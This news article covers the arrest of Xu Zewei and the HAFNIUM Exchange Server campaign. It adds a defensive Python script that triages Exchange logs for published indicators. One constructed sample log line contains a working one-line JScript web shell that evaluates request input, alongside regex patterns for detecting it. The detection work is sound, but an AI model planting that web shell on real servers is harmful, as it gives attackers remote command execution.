In a significant cybersecurity case, contract hackers working for China's Ministry of State Security stole COVID-19 research from American universities in 2020 and later exploited zero-day vulnerabilities in Microsoft Exchange Server in the mass-compromise campaign publicly known as HAFNIUM. The indictment of Xu Zewei, unsealed after his arrest in Italy, ties one individual to both operations and underscores the persistent threat posed by state-backed cyber espionage.
The Arrest of Xu Zewei
On July 3, 2025, Italian authorities arrested 33-year-old Chinese national Xu Zewei in Milan, following a U.S. extradition request. Xu faces a nine-count federal indictment, including charges of conspiracy to commit wire fraud, unauthorized access to protected computers, intentional damage to protected computers, and aggravated identity theft. If convicted on all counts, Xu could face up to 77 years in prison.
This arrest marks a significant milestone in the fight against state-sponsored cyber espionage: the FBI described it as one of the first occasions on which a hacker working on behalf of Chinese intelligence services has been taken into custody for extradition to the United States.
The COVID-19 Research Theft Campaign
Between February 2020 and June 2021, Xu and his associates conducted a systematic campaign to steal critical COVID-19 research from American institutions. Operating under the direction of China’s Ministry of State Security (MSS) and its Shanghai State Security Bureau (SSSB), the hackers targeted U.S. universities, immunologists, and virologists engaged in developing vaccines, treatments, and testing protocols.
Court documents reveal that on February 19, 2020, Xu confirmed to his SSSB handler that he had successfully compromised the network of a research university in the Southern District of Texas. Three days later, the SSSB officer directed Xu to specifically target email accounts belonging to virologists and immunologists conducting COVID-19 research. Xu subsequently confirmed he had acquired the contents of these researchers’ mailboxes.
The HAFNIUM Campaign
According to the indictment, the operation expanded dramatically in late 2020, when Xu and his co-conspirators began exploiting zero-day vulnerabilities in Microsoft Exchange Server. This mass campaign, publicly known as “HAFNIUM” after the name Microsoft gave the actor, compromised thousands of servers worldwide. The attackers chained four vulnerabilities: CVE-2021-26855, a pre-authentication server-side request forgery that let them send requests to the Exchange server as a trusted user, followed by CVE-2021-26857 (insecure deserialization in the Unified Messaging service) and the post-authentication arbitrary file writes CVE-2021-26858 and CVE-2021-27065, which were used to drop files onto the server and gain persistent access.
Court documents state that HAFNIUM targeted over 60,000 U.S. entities and compromised more than 12,700 of them. Victims included universities, law firms, defense contractors, and government agencies. The attackers installed web shells on compromised servers, giving them remote command execution for data theft and lateral movement within victim networks, and the shells remained usable even after the underlying vulnerabilities were patched.
The campaign had unprecedented global reach. Early press estimates in March 2021 put the number of affected servers worldwide at roughly 250,000. The European Banking Authority, the Norwegian Parliament, and Chile’s Commission for the Financial Market were among the high-profile victims.
Microsoft released out-of-band security updates on March 2, 2021, but by then exploitation was already widespread. The FBI and the Cybersecurity and Infrastructure Security Agency (CISA) issued urgent advisories directing organizations to patch immediately and, because patching closes the entry point without removing web shells already planted, to search their Exchange logs and web directories for signs of prior compromise.
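The advisories told administrators to check their own servers, not just to patch. As an added example, not code from the original article, the indictment or any vendor tool, the following Python script triages two of the indicators Microsoft published in March 2021: HttpProxy log lines with an empty AuthenticatedUser and an AnchorMailbox beginning with “ServerInfo~” (CVE-2021-26855), and ECP server log lines in which a Set-*VirtualDirectory call writes script into a virtual-directory URL (CVE-2021-27065). The log lines, the trimmed field lists and the hostnames and IP addresses are constructed for the example; real Exchange logs carry many more columns, so the parser keys fields by the header name rather than by position.

```python
"""Triage Exchange HttpProxy and ECP logs for two HAFNIUM indicators.

Added example. Detection rules follow Microsoft's published March 2021
indicators for CVE-2021-26855 and CVE-2021-27065; sample logs below are
constructed with a trimmed set of columns for illustration.
"""
import csv
import re

# Constructed HttpProxy sample (real logs: %ExchangeInstallPath%\Logging\HttpProxy).
# Field names match the real '#Fields:' header; the column set is trimmed.
HTTPPROXY_LOG = """\
#Fields: DateTime,Protocol,UrlStem,AuthenticatedUser,AnchorMailbox,ClientIpAddress,HttpStatus
2021-03-01T02:10:11.120Z,Owa,/owa/auth/logon.aspx,,,203.0.113.7,200
2021-03-01T02:11:40.332Z,Ecp,/ecp/default.flt,,ServerInfo~exch01.corp.example/autodiscover/autodiscover.xml,203.0.113.7,200
2021-03-01T02:12:03.901Z,Mapi,/mapi/emsmdb/,CORP\\alice,alice@corp.example,10.0.0.21,200
2021-03-01T02:13:55.004Z,Ecp,/ecp/y.js,,ServerInfo~localhost/ecp/proxyLogon.ecp,203.0.113.7,200
"""

# Constructed ECP server sample (real logs: %ExchangeInstallPath%\Logging\ECP\Server).
# The first line is a legitimate admin change; the second writes a script tag into
# ExternalUrl, which is how a web shell was planted via CVE-2021-27065.
ECP_LOG = """\
#Fields: DateTime,ClientIpAddress,UrlStem,Command
2021-03-01T02:14:09.210Z,10.0.0.5,/ecp/DDI/DDIService.svc/SetObject,S:CMD=Set-OabVirtualDirectory.ExternalUrl='https://mail.corp.example/OAB'
2021-03-01T02:14:31.877Z,203.0.113.7,/ecp/DDI/DDIService.svc/SetObject,S:CMD=Set-OabVirtualDirectory.ExternalUrl='http://f/<script language=JScript runat=server>function Page_Load(){eval(Request['x'])}</script>'
"""

# CVE-2021-26855: unauthenticated request whose AnchorMailbox is a ServerInfo~host/path token.
SERVERINFO_ANCHOR = re.compile(r"^ServerInfo~[^/]+/")
# CVE-2021-27065: any Set-<App>VirtualDirectory command carrying a <script tag in its URL.
SET_VDIR_WITH_SCRIPT = re.compile(r"Set-\w+VirtualDirectory.*<script", re.IGNORECASE | re.DOTALL)


def parse_log(text):
    """Parse a '#Fields:'-headed CSV log into dicts keyed by field name.

    Other '#'-prefixed preamble lines are skipped, as is any data that
    appears before a header has been seen.
    """
    fields = None
    rows = []
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if raw.startswith("#Fields:"):
            fields = [f.strip() for f in raw[len("#Fields:"):].split(",")]
            continue
        if raw.startswith("#") or fields is None:
            continue
        values = next(csv.reader([raw]))
        rows.append(dict(zip(fields, values)))
    return rows


def find_ssrf_probes(rows):
    """HttpProxy rows matching the published CVE-2021-26855 indicator."""
    return [
        r for r in rows
        if r.get("AuthenticatedUser", "") == ""
        and SERVERINFO_ANCHOR.match(r.get("AnchorMailbox", ""))
    ]


def find_webshell_writes(rows):
    """ECP rows where a virtual-directory URL is being set to script content."""
    return [r for r in rows if SET_VDIR_WITH_SCRIPT.search(r.get("Command", ""))]


def triage(httpproxy_text, ecp_text):
    """Return hit counts and the distinct client IPs behind the hits."""
    probes = find_ssrf_probes(parse_log(httpproxy_text))
    writes = find_webshell_writes(parse_log(ecp_text))
    return {
        "ssrf_probes": len(probes),
        "webshell_writes": len(writes),
        "source_ips": sorted({r["ClientIpAddress"] for r in probes + writes}),
    }


if __name__ == "__main__":
    for key, value in triage(HTTPPROXY_LOG, ECP_LOG).items():
        print(f"{key}: {value}")
```

On the constructed sample the script reports two unauthenticated ServerInfo~ probes and one scripted virtual-directory write, all from the same external address. Hits are leads for an investigation rather than proof of compromise: the next steps are to pull the .aspx files under the OAB and owa\auth directories, compare them with a known-good install, and treat the server as compromised until that review is done.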
The Ongoing Threat
Despite the arrest of Xu Zewei, the threat from state-sponsored cyber espionage remains significant. His co-conspirators were not arrested, and the HAFNIUM campaign is a stark reminder of how a single flaw in widely deployed, internet-facing software can be turned against thousands of organizations at once by a nation-state actor.
Organizations are urged to maintain robust cybersecurity practices, including prompt patching of internet-facing services, monitoring for unusual activity and for web shells or other persistence left behind after a patch, and educating employees about phishing and other common attack vectors.
The international community continues to grapple with the challenges posed by cyber espionage. The arrest of Xu Zewei is a step forward, but it also highlights the need for ongoing vigilance and cooperation among nations to combat these threats.